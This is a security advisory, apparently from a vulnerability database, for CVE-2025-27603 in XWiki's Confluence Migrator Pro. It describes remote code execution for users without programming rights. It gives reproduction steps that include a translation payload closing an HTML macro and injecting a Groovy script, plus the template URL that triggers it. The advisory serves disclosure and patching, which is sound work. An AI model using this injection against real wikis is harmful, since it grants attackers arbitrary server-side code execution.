CVE-2025-27603: com.xwiki.confluencepro:application-confluence-migrator-pro-ui Remote Code Execution via unescaped translations
A user that doesn’t have programming rights can execute arbitrary code when creating a page using the Migration Page template. A possible attack vector is the following:
- Create a page and add the following content:
confluencepro.job.question.advanced.input={{/html}} {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("hello from groovy!"){{/groovy}}{{/async}}
- Use the object editor to add an object of type
XWiki.TranslationDocumentClasswith scopeUSER. - Access an unexisting page using the
MigrationTemplate
http://localhost:8080/xwiki/bin/edit/Page123?template=ConfluenceMigratorPro.Code.MigrationTemplate
It is expected that {{/html}} {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("hello from groovy!"){{/groovy}}{{/async}} will be present on the page, however, hello from groovy will be printed.
References
- github.com/advisories/GHSA-6qvp-39mm-95v8
- github.com/xwikisas/application-confluence-migrator-pro
- github.com/xwikisas/application-confluence-migrator-pro/commit/36cef2271bd429773698ca3a21e47b6d51d6377d
- github.com/xwikisas/application-confluence-migrator-pro/security/advisories/GHSA-6qvp-39mm-95v8
- nvd.nist.gov/vuln/detail/CVE-2025-27603
Code Behaviors & Features
Detect and mitigate CVE-2025-27603 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →